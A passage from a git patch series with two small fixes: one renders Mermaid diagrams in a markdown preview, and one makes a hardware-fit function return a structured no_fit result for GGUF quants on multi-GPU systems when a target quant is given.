     _utcnow_naive,
     rank_search_results,
     recency_score,

From e5d3f2211b8ef7dcea68b784d45b9371ee71f4bb Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Thu, 4 Jun 2026 09:25:15 -0400
Subject: [PATCH 11/12] fix(document): render Mermaid in markdown preview
 (#2415)

---
 static/js/document.js | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/static/js/document.js b/static/js/document.js
index 6696d60..1d38121 100644
--- a/static/js/document.js
+++ b/static/js/document.js
@@ -8554,6 +8554,9 @@ import * as Modals from './modalManager.js';
       if (window.hljs) {
         preview.querySelectorAll('pre code').forEach(b => window.hljs.highlightElement(b));
       }
+      if (markdownModule && markdownModule.renderMermaid) {
+        markdownModule.renderMermaid(preview);
+      }
       preview.style.display = '';
       wrap.style.display = 'none';
     } else {

From cf5c5118d869149ef239733ecdc8b300ed69666b Mon Sep 17 00:00:00 2001
From: raf <146721410+rafdog1222@users.noreply.github.com>
Date: Thu, 4 Jun 2026 21:25:36 +0800
Subject: [PATCH 12/12] fix(hwfit): return no_fit instead of None when
 target_quant is a GGUF tier on multi-GPU (#2375)

The multi-GPU GGUF filter at fit.py:380 returned None unconditionally
for Q*/IQ quants on 2+ GPU systems. When the caller explicitly passes
target_quant, they are asking 'what happens if I try this?' and expect
a structured no_fit response, not a silent None.

Fix: skip the filter when target_quant is explicitly provided so the
call falls through to the existing no_fit path.

Fixes #
---
 services/hwfit/fit.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/services/hwfit/fit.py b/services/hwfit/fit.py
index 3136d7b..9a45b53 100644
--- a/services/hwfit/fit.py
+++ b/services/hwfit/fit.py
@@ -377,7 +377,7 @@ def analyze_model(model, system, target_quant=None, scoring_use_case=None, targe
     # Multi-GPU filter: skip the row if the resolved quant is a GGUF tier
     # (Q*/IQ-prefixed) — vLLM/SGLang can't serve those, so showing them on
     # a 2+ GPU rig just clutters the list with unservable candidates.
-    if gpu_count >= 2 and quant_to_try and quant_to_try.upper().startswith(("Q2", "Q3", "Q4", "Q5", "Q6", "Q8", "IQ")):
+    if gpu_count >= 2 and quant_to_try and not target_quant and quant_to_try.upper().startswith(("Q2", "Q3", "Q4", "Q5", "Q6", "Q8", "IQ")):
         return None
 
     result = _try_quant_at(model, quant_to_try, ctx, effective_vram, 0 if native_gpu_only else eff_ram)